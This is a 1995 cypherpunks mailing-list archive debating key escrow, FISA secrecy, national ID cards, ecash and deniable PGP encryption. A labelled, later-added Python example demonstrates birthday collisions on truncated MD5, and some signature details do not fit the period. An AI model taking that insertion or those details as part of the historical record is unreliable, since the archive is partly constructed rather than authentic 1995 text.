The FISA court has granted over  7,500 wiretap requests in complete
secrecy with only one refusal. The secrecy of this court creates a great
opportunity for abuse. If the court is lied to, the lie is not exposed,
because the people with an interest in exposing the lie do not know the
lie exists. If the court grants legally unwarranted warrants, there is
no one to appeal or to try to stop the practice, because no one knows
about the problem. For information, see:
http://MediaFilter.org/MFF/CAQ/caq53.court.html
 
6) It is too humiliating to require a free people to participate in the
establishment of their own surveillance prisons. This is  what key
escrow requires. Consider the words of our revolutionary heritage:
 
	Those who would sacrifice essential freedoms for temporary safety
	deserve neither. Benjamin Franklin
 
	If ye love wealth greater than liberty, the tranquility of servitude
	greater than the animating contest for freedom, go home from us in
	peace.  We seek not your counsel, nor your arms.  Crouch down and 
	lick the hand that feeds you; and may posterity forget that ye 
	were our countrymen. Samuel Adams
 
Do you think that these men would approve the government's key escrow
requests?
 
This information can also be found at the following url:
http://www.efh.org/pgp/rant.html
- -- 
Paul Elliott                                  Telephone: 1-713-781-4543
Paul.Elliott@hrnowl.lonestar.org              Address:   3987 South Gessner #224
                                              Houston Texas 77063

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAgUBMFA5K/BUQYbUhJh5AQGOjAP+OyDEtAJGL32S8IK+HGAfaOTkpCI18SCL
QvSTaknPd5J2m+yzamGD88Z2YJKwW1M+2GgqGqsclCpI+KCvSp2Z9h1KXWT6ANGR
MXTuK3fjVmlvp5lqZAwHb133qL97e60MIq+5lK26FPaGzBCr7ckPMF0cvM+mm4dW
dyc1uuXaZg0=
=bVzd
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Fri, 8 Sep 95 10:43:41 PDT
To: cypherpunks@toad.com
Subject: 64-bit GAK && 128-bit hashes
Message-ID: <9509081743.AA03448@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


The recent guidelines for proposed export regulations from NIST include  
64-bit keys and several people here have commented that this implies NSA  
ability to brute-force 64-bit keys now or in the near future ("belt and  
suspenders").  How does this bode for 128-bit hash functions such as MD5?  If  
64-bit encryption algorithms can be brute-forced, could birthday attacks and  
the like on 128-bit hashes be feasible as well?  Perhaps the crypto community  
should start seriously considering moving away from MD5 and towards 160-bit  
hashes such as SHA or even 256-bits...


andrew
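
Added example, not part of the original post: the work-factor arithmetic behind the question above, measured on MD5 truncated to small widths so that it runs in seconds. A collision search on an n-bit hash costs about 2^(n/2) evaluations while a preimage search costs about 2^n, which is why a 128-bit hash and a 64-bit key sit in the same range; the message prefixes and truncation widths are constructed for illustration.

```python
import hashlib
import math


def truncated_md5(data: bytes, bits: int) -> int:
    """Return the top `bits` bits of MD5(data) as an integer."""
    digest = int.from_bytes(hashlib.md5(data).digest(), "big")
    return digest >> (128 - bits)


def expected_birthday_trials(bits: int) -> float:
    """Expected hash evaluations before the first collision: sqrt(pi/2 * 2^bits)."""
    return math.sqrt(math.pi / 2 * 2.0 ** bits)


def birthday_collision(bits: int, prefix: bytes = b"constructed-sample-"):
    """Find two distinct messages whose truncated digests collide.

    Returns (msg_a, msg_b, trials). Memory grows with the number of
    digests remembered, which is also about 2^(bits/2).
    """
    seen = {}
    counter = 0
    while True:
        msg = prefix + str(counter).encode()
        tag = truncated_md5(msg, bits)
        counter += 1
        if tag in seen:
            return seen[tag], msg, counter
        seen[tag] = msg


def preimage_search(target: int, bits: int, prefix: bytes = b"preimage-try-"):
    """Brute-force a message whose truncated digest equals `target`.

    Returns (msg, trials). Expected cost is about 2^bits trials, the
    square of the collision cost for the same width.
    """
    counter = 0
    while True:
        msg = prefix + str(counter).encode()
        counter += 1
        if truncated_md5(msg, bits) == target:
            return msg, counter


def measure(widths=(16, 20, 24, 28, 32)):
    """Return rows of (bits, measured collision trials, expected trials)."""
    rows = []
    for bits in widths:
        _, _, trials = birthday_collision(bits)
        rows.append((bits, trials, expected_birthday_trials(bits)))
    return rows


if __name__ == "__main__":
    print("bits  measured  expected")
    for bits, trials, expected in measure():
        print(f"{bits:4d}  {trials:8d}  {expected:10.0f}")

    # Preimage cost on the same toy scale (16 bits only, since it grows as 2^bits).
    target = truncated_md5(b"constructed target message", 16)
    _, trials = preimage_search(target, 16)
    print(f"16-bit preimage found after {trials} trials (expected about {2**16})")

    # Extrapolation to full-width hashes, compared with exhaustive key search.
    for hash_bits in (128, 160, 256):
        work = math.log2(expected_birthday_trials(hash_bits))
        print(f"{hash_bits}-bit hash: collision work about 2^{work:.1f}")
    print("64-bit key: exhaustive search averages 2^63 trial decryptions")
```

The measured counts track sqrt(pi/2 * 2^n) closely, so moving from a 128-bit to a 160-bit hash raises the collision cost from about 2^64 to about 2^80.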




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Fri, 8 Sep 95 10:05:26 PDT
To: cypherpunks@toad.com
Subject: Hacking banking (fwd)
Message-ID: <Pine.SOL.3.91.950908125820.14938A@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Fri, 8 Sep 95 15:21:00 UTC
From: d.wiesner@genie.geis.com
Subject: Hacking banking

 
An interesting article appeared on Page B1 of the 9/7/95 San
Francisco Examiner.  Titled "Keystroke Cops," it discusses the FBI's
new cyberswat team.  In the midst of a routine discussion of whether
law enforcement needs to keep up with cyberspace criminals, the
following intriguing quote appeared.
 
"Already, Fuentes said, federal authorities in New York are
investigating whether programmers hired to write software for a
financial institution may have left a 'back door' open in the
program, one through which money may have been diverted to foreign
bank accounts."
 
Does anyone know what this federal investigation in New York is
about?   How about copying this note around and seeing what people
can find out?
 
David Wiesner

----

My pleasure, Dave.

bd





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 8 Sep 95 13:06:19 PDT
To: Doug Hughes <doug@Eng.Auburn.EDU>
Subject: [NOISE] Re: Notes from NIS&T Key Escrow Export conference.
Message-ID: <199509082006.NAA24844@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:04 PM 9/7/95 -0500, you wrote:
>> Sorry for the typo, yes, I meant sham, fake, theater, all smoke  and
>> mirrors, nothing sincere, etc. See reference to "stage" above.
>> 
>In this context, I think burlesque fits remarkably well. ;)
>(Brings to mind a bunch of cross-dressers doing big theatre numbers
>in exotic costumes)

"I never wanted to be an eavesdropper - I wanted to be a ... lumberjack!"

#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 8 Sep 95 13:08:20 PDT
To: hallam@w3.org
Subject: Re: ON OFF-TOPIC   [NOISE]
Message-ID: <199509082006.NAA24898@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:16 PM 9/7/95 -0400, Phill wrote:
>>Nope.  but the patriots & the cyPHerpunks share a common goal, and belief 
>>that it is none of the government's business what we think or want to 
>>share with our computers.
>Poor you, the only major political party to come out with a pro crypto
>statement is a socialist party.

But - wait!  Of course you're not a patriot - You're a foreigner!  Oh, no! :-)

>The problem is currently with the right wing, right wing democrats such as 
>Clinton and practically all the Republicans. 

As you later point out, it's really an authoritarian/libertarian issue,
(though it's at least nice to hear somebody else who realizes Clinton's
no liberal :-); it affects both economic control/freedom issues
and freedom of speech issues as well.  A lot of the Republicans,
mainly the newly elected ones, are less anti-crypto, partly because
they're pro-business, and sometimes pro-free-speech, but also because
they're not as closely tied in to the authoritarian power structure the
way Bush and Clinton have been.

>If you want a debate on how to convince the authoritarians then perhaps you
>will get some interest.
That'll be tough.  The military and police can already get good crypto, 
as can other gov't agencies that want to use it to increase their power.  
Crypto can also be really effective for National ID cards, but I'd really rather
not encourage them to think along those lines at all, even using Chaum
techniques.
You can use it to hide campaign contributions and bribes, but of course they
probably don't want to admit that in public.  If everyone in the government
were to use key-escrowed phones, folks like Ollie North would probably realize
they had to be careful with their communications, but it would at least let
gentlemen read each others' mail...

Is there something authoritarians want, that we don't mind them having,
for which crypto would be an enabling technology?  Some of them _might_
be interested in having better encryption for TV channels so that kids
can't watch a NotForKids channel (though many of them might rather ban
it outright) or so they can easily control whether their kids get to
watch MTV even though the V-Chip doesn't have a NoisyKidsMusic bit.
Perhaps they'd enjoy having reputation systems available, so they can
easily filter out politically incorrect material, or do a thumbs-down
on things they disapprove of, or let the Baptists and Catholics and
Anti-Baptists all have their own convenient ratings.
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 8 Sep 95 13:07:37 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: cryptography eliminates lawyers?
Message-ID: <199509082006.NAA24910@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>> > Telecoms will certainly break the professional 
>> > monopoly of lawyers (and other professionals).
>> This I don't.  How do you mean exactly?
>Licensing requires the ability to outlaw unlicensed transactions.  
>Since the Net trumps censorship and allows consultations at a 
>distance, it cracks licensing,

It does reduce the ability of geographical organizations
to restrict who does business there, so markets will probably
force some shakeups in jurisdictions.  But lawyer work seems
to mostly involve either contracts or courts - as long as 
courts are still run by governments, they can restrict who
gets to practice in them, and who's allowed to write paper that
they'll judge disputes about.  Crypto _could_ be used for
a modern version of the Stamp Tax - documents might need to 
be digitally signed by Certified Lawyers (though of course
that may be lawyers putting their stamps on work mostly done
by clerks.)  

Crypto may make it easier to resolve some kinds of disputes,
by identifying who did what when, but the net isn't going to
make the number of disputes decrease....
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 8 Sep 95 10:22:19 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Car rentals, Driver's Licenses, Ecash, & Net Access
Message-ID: <199509081721.NAA00705@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green's reply to someone else motivated me to comment:

>>Suppose you have acquired a million dollars worth of legal, above-board
>>DigiCash dollars and you want to surreptitiously transfer this wealth to a
>>below-board friend.  Your friend creates a temporary anonymous account at an
>>understanding bank.  Y
>
>Won't work. Ecash, except as used for frequent flyer like points, will
>exist in only *one* world wide e$ currency, issued by a single entity
>composed of various major banks and subject to US laws. Getting Ecash
>accounts will therefore be subject to the same legal requirements that
>apply to normal US checking accounts.

For the holiday weekend, I rented a car at a major agency in the state where
I usually sleep.  To secure the rental, I presented a driver's license from
another state and a secured VISA card.  The agency presented me with a car
bearing the license plates of a Southern state far away from the rental
location.  In the past, this agency (one of the majors BTW) had given me a
car registered in yet another Southern state for a week's rental bearing a
registration that expired halfway through that week.  No problems in any case.

Interestingly enough, the agency refuses to rent to local citizens of the
state where it is located and where I often sleep.  My possession of a
"foreign" DL makes it easier for me to rent cars.  Money and imagination
overcome many of the "social control" aspects of licensing and registration
requirements.

Now what this all has to do with transaction controls is the following.  It
is suggested that governments and private parties will cooperate in imposing
absolute restrictions on people's ability to complete "unlicensed"
transactions.  Thus it is suggested that driving, possession of a motor
vehicle, working for pay, having a bank account, having a phone account,
having a net account can all be rigidly controlled.

We've all read the stories about the DMV and how various states are pulling
licenses for child support arrears, tax evasion, overdue library books, etc.
The Feds have proposed a National SS# Database that would have to be
consulted before the 60 Million people who annually change jobs would be
allowed to do so.  And it is easy to imagine that additional restrictions
would soon be placed on job changes.  After all, we don't want deadbeat
dad-tax evading-library book hoarders working in this country, do we?
Likewise the Bank Secrecy Act of 1970, et seq was supposed to end anonymous
bank accounts.  And a lot of the recent porn on the nets agitation has
involved attacks on anonymity.  Suggestions have been made for licensing net
access.  Finally, electronic check proposals are supposed to be traceable
because those who open accounts will be identified.

The readers of this list can apply what they already know about the
difficulty involved in restricting net access to the analysis of these other
existing and proposed restrictions.  The problem with the theory of
transaction blocking is that it requires millions of potential sellers of
goods, services, and jobs around the world to turn away customers.
Something that most people are unwilling to do.

Thus, if some entity tries to control net access by restricting it to
"licensed" users --- a real legal problem in the US BTW --- all that you
have to do is open an account somewhere else on earth and dial out to it or
use a connection via an X25 network.  All the Great Enemy can do is make you
spend a little more money.  Eventually of course, encrypted untraceable
TCP/IP sessions will be possible and domestic ISPs could -- without risk ---
offer "encrypted only" pipes out to the nets.  "Once you get there it's up
to you what you do but we don't/can't know about it."  

Note that soon, millions of people will have high-speed, cable-based,
full-time net access.  These people will be one mouse click away from being
a full-service ISP.  Stick the ISP in a Box BSD CD-ROM in the drive and
double-click on setup.exe.  If the CD-ROM is produced by the right parties,
it will automatically support encrypted TCP/IP.  These millions of ISPs can
offer net-access accounts right away and add dial up later for the neighbors
if they feel like it. 

It is the vast number of vendors and the cheapness of the connection that
makes it so hard to control net access.  The computer and telecoms
revolution has the same effect on banking and other services to which the
authorities hope to block access.

Thus cheap telecoms, computing power, and well-developed electronic funds
transfer systems are easily turned into free banking.  We all know that
every node/user on the net is a potential gateway to another network
(potentially of great size) on the "other side" of his connection.  In the
same way, every user of "cheap, easy, and open" electronic funds transfer
system is a potential bank, a potential money "switch".  The famous Fort Lee
Switch located in Fort Lee, New Jersey at the West end of the George
Washington Bridge is an important switch for the financial funds transfer
networks going into and out of NYC.  Think of it as the IBM 360 running a
proprietary operating system on a somewhat closed loop.  The future open
funds transfer systems will be like the personal computers that can far
exceed the performance of the old monopoly mainframes.  

Since everyone will be able to switch funds (and every *one* includes every
fictitious entity, software agent, corporation, trust, organization, or firm
anyone can create on earth) they will be able to switch funds for anyone
else.  Controlling a system with an almost unlimited number of switch points
will not prove possible.

Individuals and the entities they control can be counted on to protect
themselves from the financial losses occasioned by fraud or theft.  They can
be their own auditors.  But they can't be counted on to forego profit so
that the governments of the world can try and prevent some people from
engaging in mutually beneficial private transactions.

An attempted cartel of that sort --- one that tries to enlist the billion or
so people who will be easily and reliably switching funds within a few years
--- is doomed to failure.  Too many potential 'cheaters.'  Too much money to
be made by breaking with the cartel and offering financial services to
others who wish to use them.

And where money leads, other forms of human interaction will follow.  Once
money is free it can buy, bribe, or finagle its way past the other
attempted restrictions on voluntary transactions.  

DCF

"If you can figure out a way to keep 1 billion people who have cheap,
powerful, uncensored, computers and telecommunications from being free;
you're a better man than I am Gunga Din."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Fri, 8 Sep 95 10:32:50 PDT
To: cypherpunks@toad.com
Subject: (Fwd) CFP: Workshop on Information Hiding
Message-ID: <9509081732.AA26869@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


This was on the www-security list.

------- Forwarded Message Follows -------
Date: Mon, 28 Aug 95 12:11:06 EDT
From: allegra!slow@uunet.uu.net (Steven H. Low)

There's a www version on 
	http://www.cl.cam.ac.uk/users/rja14/ihws.html


=================================================================


		Workshop on Information Hiding 

		    First Call for Papers 

		     30 May - 1 June 1996

	Isaac Newton Institute, University of Cambridge, UK


Many researchers are interested in hiding information or in stopping other
people doing this. Until now, their efforts have been fragmented, with
different groups interested in copyright marking of digital objects, covert
channels in computer systems, subliminal channels in cryptographic
protocols, broadcast encryption schemes, low-probability-of-intercept
communications such as spread spectrum and meteor scatter, and various
kinds of anonymity services ranging from steganography through location
security to digital elections.

However these areas of study are closely linked, and we wish to create an
opportunity for a fruitful exchange of ideas. We are therefore organising a
workshop on information hiding, which will form part of a six month
research programme being held at the Isaac Newton Institute on Computer
Security, Cryptography and Coding Theory. Given a positive response
from the research community, it is hoped that this will become a regular
event.


Instructions for authors:

Interested parties are invited to submit papers on research and practice
which are related to these areas of interest. Submissions can be made
electronically (latex or postscript; preferred format is latex using llncs.sty)
or in paper form; in the latter case, send eight copies suitable for blind
refereeing (the authors' names should be on a separate cover sheet and there
should be no obvious references). Papers should not exceed fifteen pages in
length.


Addresses for submission:

ross.anderson@cl.cam.ac.uk

Ross Anderson, Cambridge University Computer Laboratory, Pembroke
Street, Cambridge CB2 3QG, England


Deadlines:

Paper submission:               31st December 1995
Notification of acceptance:     29th February 1996
Camera-ready copy due:          31st March 1996 


Program committee:

Ross Anderson (Cambridge University)
Steve Low (AT&T Bell Laboratories)
Ira Moskowitz (US Naval Research Laboratory)
Andreas Pfitzmann (Technical University of Dresden)
Gus Simmons (University of New Mexico)
Michael Waidner (IBM, Zuerich)




Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: trollins@hns.com (Tom Rollins)
Date: Fri, 8 Sep 95 10:40:11 PDT
To: mark@unicorn.com (Rev. Mark Grant)
Subject: Re: Scientology tries to break PGP - and fails?
In-Reply-To: <Pine.3.89.9509081833.A4038-0100000@unicorn.com>
Message-ID: <9509081739.AA20098@dcn92.hns.com>
MIME-Version: 1.0
Content-Type: text


> 
> On Fri, 8 Sep 1995, Tom Rollins wrote:
> 
> > I took a look at the FACTNet web page.  There is a file encrypted with
> > PGP using the "-c" option.  They are asking for people to help guess
> > the Pass Phrase.  Why would anyone bother if they had no clue that the
> > file contained anything 'interesting'.
> 
> I can only assume one of two things - either this is a joke, as the
> decrypted contents are nothing special as far as I can see (though
> 'interesting' in a sense), or that someone is very, very clever and
> managed to hide two different messages in there with different
> passphrases.
> 
> > If this is the file that the Co$ is trying to crack, then what the
> > is being asked for is a pass phrase that can be handed to the Co$ that
> > will pass the PGP valid key check and still not decrypt the data to
> > anything useful.
> 
> If this is the file the Co$ want to crack, they're a) clearly 
> cryptographically inept, and b) the joke's clearly on them 8-).. Any 
> hacker worthy of the name ought to get the passphrase within three 
> attempts (I got it first time).
> 
> Note for paranoids: Of course, this message may just be a ruse to put 
> the Co$ off the scent ;-)..
> 
> 	Mark

Ooops, I see what you mean.  It is funny !
I simply did not take this at face value.

-tom



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Blossom <eb@comsec.com>
Date: Fri, 8 Sep 95 14:04:51 PDT
To: cp-lite@comsec.com
Subject: Cypherpunks Lite archives now available
Message-ID: <199509082050.NAA22694@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain


I've made available archives of the last 8 months of Cypherpunks Lite
for your perusal.

	ftp://ftp.crl.com/users/co/comsec/cp-lite

One year subscriptions are available for $20.  To subscribe, send check
or money order to:

	COMSEC Partners
	1275 Fourth St., Suite 194
	Santa Rosa, CA 95404.

Be sure to indicate your email address and whether you want
message-by-message delivery or a daily digest.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Fri, 8 Sep 95 05:09:39 PDT
To: cypherpunks@toad.com
Subject: Re: fast modular reduction (proof?)
Message-ID: <9509081207.AA02681@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain



Oops, sorry for sending it twice. After the first mail
I got an error message which said the mail wasn't delivered
because it contained control characters. I thought the first
mail didn't go out.
Hadmut :-(





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Fri, 8 Sep 95 11:16:47 PDT
To: cypherpunks@toad.com
Subject: Privacy book list
Message-ID: <95Sep8.141612edt.4207@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


I got a letter in the mail today from Plenum Publishing Corp in NY,
advertising a book called _Mind Your Own Business: The Battle for
Personal Privacy_ by Gini Graham Scott.  It seems I am on a
mailing list for privacy freaks.  Oh the irony!

They must have gotten my name from somewhere.  The only two sources that
I can think of are the lists for CFP '94 and '95, and a
revolver club that I used to be a member of.  Has anyone else on the 
list gotten this ad? 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Fri, 8 Sep 95 11:25:35 PDT
To: Matthew Ghio <ghio@c2.org>
Subject: Re: Commercial Speech over Internet product
In-Reply-To: <m0sqray-0012qWC@myriad>
Message-ID: <Pine.SUN.3.91.950908142327.4660B-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Sep 1995, Matthew Ghio wrote:

> The program is a sound-listening extension for web-browsers.  There is
> really no use for crypto because it's only processing information which
> is already public.

I can easily imagine pay recorded sex lines or pay stock market analysis 
via this service, either of which you might want to have encrypted.

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Fri, 8 Sep 95 11:42:54 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Correction about who opposes crypto regulations....
In-Reply-To: <ac75051735021004fa02@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.950908142844.4660D-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Sep 1995, Timothy C. May wrote:

> On the contrary, the Libertarian Party has come out strongly in favor of
> cryptography and privacy, and they are consistently either #3 or #4 in
> popularity.

The US Libertarian Party Platform supports crypto, and the LP has issued
press releases critical of the FBI Telecom (wiretapping) Bill and Clipper. 
The LP was also part of the coalition against internet censorship this
year. 

The LP is the third largest political party in the US, and party members
hold over 150 elected and appointed public offices in the U.S.  They will
again have a presidential candidate on the ballot in all 50 states next
year as they did in the last election, and a potential LP presidential
candidate (Harry Browne, http://www.rahul.net/browne) will be in the
CityVote debates which will be nationally televised next month.  The LP
was also the first party to have a female candidate who won an Electoral
College vote.  For more details on the LP, you should go to 
http://www.lp.org/lp

-Thomas Edwards





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Fri, 8 Sep 95 11:57:31 PDT
To: "Cortland D. Starrett" <cort@bioanalytical.com>
Subject: Re: cryptography eliminates lawyers?
In-Reply-To: <199509061709.MAA00612@bioanalytical.com>
Message-ID: <Pine.BSD/.3.91.950908144400.18201E-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


We wish!  We really wish!

==========================================================================
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. |   _ |>
  \|/  |sunder@escape.com| Where day by day, yet another   |   \ |
<--+-->|                 | Constitutional right vanishes.  |    \|
  /|\  |    Just Say     |                                 |    <|\
 + v + | "No" to the NSA!| Jail the censor, not the author!|    <| n
==========================================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Fri, 8 Sep 95 11:45:51 PDT
To: Yih-Chun Hu <yihchun@u.washington.edu>
Subject: Re: ON OFF-TOPIC
In-Reply-To: <Pine.OSF.3.91j.950907213051.24322B-100000@saul3.u.washington.edu>
Message-ID: <Pine.SUN.3.91.950908144336.4660E-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Sep 1995, Yih-Chun Hu wrote:

> Whatever. Clinton proposed crypto, some democrat wrote the electronic
> decency act. (In fact Gingrich was against it)

Nevertheless, Gingrich did not flinch when internet censorship 
amendments to the telecom bill went right by him in the House.

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Fri, 8 Sep 95 11:57:33 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: Looking for IETF old-timers (and others)
Message-ID: <Pine.PMDF.3.91.950908145510.541122815A-100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


I've put up on a web page some parts of a paper I am writing on Internet 
jurisprudence.  I'd welcome comments from anyone (this is a very early 
draft), but especially from any IETF old-timers, as the paper has a lot 
about the early days of internet standardmaking.

The URL is http://www.law.miami.edu/~mfroomki/ils/ils.htm

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See (soon to move to its real home): http://www.law.miami.edu/~mfroomki





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Fri, 8 Sep 95 12:20:21 PDT
To: cypherpunks@toad.com
Subject: Cato Study Release:  National ID Card Ineffective and Intrusive
Message-ID: <Pine.SUN.3.91.950908151745.4770A-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain



CATO STUDY RELEASE

September 7, 1995

National ID card ineffective and intrusive, study says

Congressional Republican proposals to create a national
computerized registry and an ID card for all American workers
would establish "a dangerous, invasive, and unworkable new
expansion of federal police-state powers," according to a new
Cato Institute study.

In "A National ID System: Big Brother's Solution to Illegal
Immigration" (Policy Analysis no. 237), John J. Miller and
Stephen Moore say Sen. Alan Simpson (R-Wyo.) and Rep. Lamar Smith
(R-Tex.) are taking the "critical first step" toward implementing
a potentially invasive national worker authorization system. 
Moore is director of fiscal policy studies at the Cato Institute,
and Miller is vice president of the Center for Equal Opportunity.

An Orwellian system

The authors say that Smith and Simpson want to require an ID card
and computerized worker registry for the 150 million Americans
and legal immigrants in the U.S. labor force.  Sen. Dianne
Feinstein (D-Calif.) wants that national ID card to include such
information as a photograph, fingerprint, and retina scan.

The study says such a system would, in effect, "require employers
to submit all of their hiring decisions for approval to a federal
bureaucrat."  The authors call the proposed registry and national
ID card "Big Brother's solution to illegal immigration."  They
say the national ID card would

    constitute a massive invasion of privacy and violation of
     basic civil liberties;

    cost the government $3 billion to $6 billion to implement; 

    subject workers to the effects of potentially huge error
     rates, with perhaps millions of legal aliens denied jobs
     because of faulty government databases (even a 2 percent
     error rate would lead to 1.3 million Americans being
     wrongfully denied jobs);

    increase discrimination against Latin and Asian Americans;
     and, ultimately,

    fail to affect illegal immigration.   

Moore and Miller say that, once established, the computer
registry could be easily expanded and applied to other areas,
vastly increasing the size and scope of government. Some of the
potential uses of the system include

    implementing a Clinton-style health care plan and security
     card;

    ensuring employer compliance with affirmative action
     requirements; 

    tracking child support payments; 

    verifying that parents are getting their children
     vaccinated; and 

    conducting background checks on would-be gun purchasers,
     among others.

Better approaches available

After spending a year defeating the Clinton administration's
health security card, Moore and Miller say, the new GOP Congress
now wants every American to carry a "work authorization card"
that would create similar potential for intrusion and abuse.

The authors claim there are ways to address the problem of
illegal immigration that would expand, rather than curtail,
Americans' basic freedoms.  We could, for example,

    expand legal immigration quotas, 

    eliminate employer sanctions law,

    establish greater economic integration between the United
     States and Mexico, 

    restrict welfare eligibility of legal and illegal
     immigrants,

    facilitate the deportation of criminal aliens,

    tighten visa control, and

    improve border enforcement.

Why it matters

It is an iron rule of politics that whenever there is a perceived
"crisis" in Washington, Congress responds by passing bad laws
that expand the powers of government.  Moore and Miller say the
immigration issue is fertile ground for such laws. The
implications of a national ID system would range far beyond
today's debate over illegal immigration. The study says the
proposed worker registry system has no redeeming feature. It will
not curtail illegal immigration, and it will create opportunities
for abuse. At a time when Americans are loudly demanding more
freedom and smaller government, Moore and Miller say a computer
registry is a giant step in the wrong direction.

                           





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Henry W. Farkas" <hfarkas@ims.advantis.com>
Date: Fri, 8 Sep 95 12:38:19 PDT
To: Tom Rollins <trollins@hns.com>
Subject: Re: Scientology tries to break PGP - and fails?
In-Reply-To: <9509081620.AA19816@dcn92.hns.com>
Message-ID: <Pine.A32.3.91.950908152050.49741B-100000@pangloss.ims.advantis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 8 Sep 1995, Tom Rollins wrote:

> If Larry Wollersheim does have the valid key.  It would be a simpler
> process to know what fake key to use and work it backwards through
> the MD5 to arrive at an ascii string to produce the fake key.
> 
> Too bad this wouldn't be plausable for the secret ring.  Perhaps PGP
> needs an option to specify the key in Hex and make the process easy.

Here's another option.  I just have no idea if it is possible, nor how it
would be implemented!  PGP could allow for an alternate secret key and a
boilerplate document.  This document would be "overlaid" or appended to
the target file at encryption.  When the safety is finally removed from
the gun at your head (sorry for the drama) you hand over your alternate
secret key.  The encrypted file is wiped until it reaches a marker; the
remainder of the file is displayed.  If you are forced to turn over keys
some day (and I think there is at least a reasonable likeihood of that) 
then They will have a much harder time arguing "But that's not what the 
file *really* said and, deep inside of me, I know it!".  At that point, 
with a secure wipe going on while the "decryption" was taking place, you 
have done the best you could.  I agree- a search warrent gives 
authorities the right to search your home (or disk)- not a guarantee that 
they'll find what they're looking for.
 
===========================================================================
     Henry W. Farkas      |      Me?    Speak for IBM?    Fat chance.
 hfarkas@ims.advantis.com |------------------------------------------------  
   hfarkas@vnet.ibm.com   |     http://newstand.ims.advantis.com/henry
      henry@nhcc.com      |          http://www.nhcc.com/~henry 
- ---------------------------------------------------------------------------
PGP 6.2.2 Key fingerprint: AA D0 F5 44 C1 8C 11 52  B3 80 34 1C CE 38 EC 53
 Public key at: pgp-public-keys@pgp.mit.edu, and other popular key servers.
- ---------------------------------------------------------------------------
Brought to you by Henry's Hardware: Home of the Pretty Good Hack "We're not
  fast, but it's not bad, and we're cheaper than the guy down the street!"
===========================================================================


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta

